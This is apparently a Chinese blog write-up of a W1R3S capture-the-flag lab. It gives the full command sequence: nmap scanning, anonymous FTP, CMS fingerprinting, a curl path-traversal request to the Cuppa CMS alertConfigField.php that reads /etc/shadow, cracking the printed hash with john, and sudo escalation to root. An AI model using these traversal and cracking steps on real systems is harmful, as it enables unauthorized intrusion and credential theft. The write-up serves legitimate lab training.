内容目录
05w1r3s打靶记录
关键词:ftp信息泄露,cms漏洞,远程任意文件包含、任意文件读取
流程记录
-
确定目标
nmap -sP 192.168.89.1/24 -
扫描全端口
nmap -sT --min-rate 10000 -p- 192.168.89.135 -
探测暴露端口服务版本等具体信息
sudo nmap -sT -sC -O -p21,22,53,80,3306 192.168.89.135 -
ftp弱口令利用,有效信息不多
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content | drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs |_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees get 命令可以下载指定文件,浏览文件使用ls 退出时exit -
常规爆破80端口目录,识别cms
dirb http://192.168.89.135/ 通过网页标题可以看出这是Cuppa CMS http://192.168.89.135/administrator/installation/ 使用指纹识别工具也可以 whatweb http://192.168.89.135/administrator/installation/ http://192.168.89.135/administrator/installation/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID,country,language], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.89.135], JQuery, Script[text/javascript], Title[Cuppa CMS], X-UA-Compatible[IE=edge] -
尝试使用Cuppa这个cms的exp,远程文件读取漏洞,由于常规url请求是get请求,无法返回敏感信息,所以这里采用curl,直接读取shadow,并保存关键行到本地
exp 链接 https://www.exploit-db.com/exploits/25971 curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.89.135/administrator/alerts/alertConfigField.php w1r3s用户的那一行 w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::一点漏洞利用的辨析
直接通过浏览器访问 URL 和使用curl命令发送请求的行为有所不同,具体原因通常和 Web 应用的处理逻辑、HTTP 请求方法以及服务器如何响应这些请求有关。让我逐一解释一下:- 直接访问 URL:通过浏览器直接访问时,默认是通过 GET 请求。浏览器会把 URL 的查询参数(例如
urlConfig=../../../../../../../etc/passwd)作为查询字符串发送。 - 使用
curl:你使用的curl命令通过--data-urlencode参数发送的是一个 POST 请求,并且在请求体中包含了 URL 编码的urlConfig参数。
不同的 HTTP 方法(GET 和 POST)在 Web 应用中的处理方式可能是不同的,尤其是在处理用户输入时。如果目标 PHP 文件 (
alertConfigField.php) 只处理POST请求中的urlConfig参数,而没有处理GET请求中的相同参数,那么 直接通过浏览器访问 URL 可能无法触发文件包含,因为没有正确地处理 GET 请求中的参数。 - 直接访问 URL:通过浏览器直接访问时,默认是通过 GET 请求。浏览器会把 URL 的查询参数(例如
-
使用john爆破密码
john pass.txt Proceeding with wordlist:/usr/share/john/password.lst computer (w1r3s) -
ssh登录主机,提权为root
sudo -l 返回值关键内容 User w1r3s may run the following commands on W1R3S.localdomain: (ALL : ALL) ALL 这意味着w1r3s 用户可以在该系统上以任何用户身份运行任何命令(包括root) 直接sudo bash或者sudo -i 即可获取root权限 甚至可以编辑/etc/sudoers文件 直接修改 /etc/sudoers 文件时,必须通过 visudo,否则容易导致语法错误,可能会锁定所有用户的 sudo 权限。 在实际工作中,尽量避免直接编辑 /etc/sudoers 文件,而是在 /etc/sudoers.d/ 中添加规则文件。 -
进入root根目录,获取fllag
----------------------------------------------------------------------------------------- ____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____ / ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___| | | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \ | |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) | \____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/ ----------------------------------------------------------------------------------------- .-----------------TTTT_-----_______ /''''''''''(______O] ----------____ \______/]_ __...---'"""\_ --'' Q ___________@ |''' ._ _______________=---------""""""" | ..--''| l L |_l | | ..--'' . /-___j ' ' | ..--'' / , ' ' |--'' / ` \ L__' \ - - '-. '. / '-./ ---------------------------------------------------------------------------------------- YOU HAVE COMPLETED THE __ __ ______________________ _________ / \ / \/_ \______ \_____ \ / _____/ \ \/\/ / | || _/ _(__ < \_____ \ \ / | || | \/ \/ \ \__/\ / |___||____|_ /______ /_______ /.INC \/ \/ \/ \/ CHALLENGE, V 1.0 ---------------------------------------------------------------------------------------- CREATED BY SpecterWires ----------------------------------------------------------------------------------------
总结与提升
- 对于文件包含漏洞的分析,可以下载这个cms的源码进行查看,在靶机的down目录和/var/www/html/目录
- 还有另一个cms,worldpress可以分析一下
- 可以尝试利用别的工具发送post请求
今天先写这么多,后续再进行补充,欢迎留言
Comments NOTHING